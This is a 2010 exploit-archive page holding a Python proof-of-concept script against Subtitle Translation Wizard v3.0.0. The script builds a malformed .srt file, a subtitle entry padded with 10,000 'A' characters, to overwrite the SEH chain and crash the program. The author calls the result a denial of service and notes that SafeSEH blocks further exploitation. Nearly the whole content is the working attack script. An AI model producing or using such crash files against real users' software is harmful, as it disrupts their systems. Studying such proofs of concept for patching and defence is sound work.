Subtitle Translation Wizard v3.0.0 SEH POC
Posted on 22 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Subtitle Translation Wizard v3.0.0 SEH POC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================== Subtitle Translation Wizard v3.0.0 SEH POC ========================================== #!/usr/bin/python # Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC # Author: Blake # Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe # Version: 3.0.0 # Tested on: Windows Vista running in VirtualBox # SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH). print " ======================================" print " Subtitle Translation Wizard v3.0.0 DoS " print " Discovered by Blake " print "====================================== " buffer = "x41" * 10000 print "[+] Creating malicious srt file" try: file = open("poc.srt","w") file.write("1 " + "00:01:48,549 --> 00:01:50,404 " + buffer) file.close() print "[+] File created" except: print "[x] Could not create file" raw_input(" Press any key to exit... ") # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>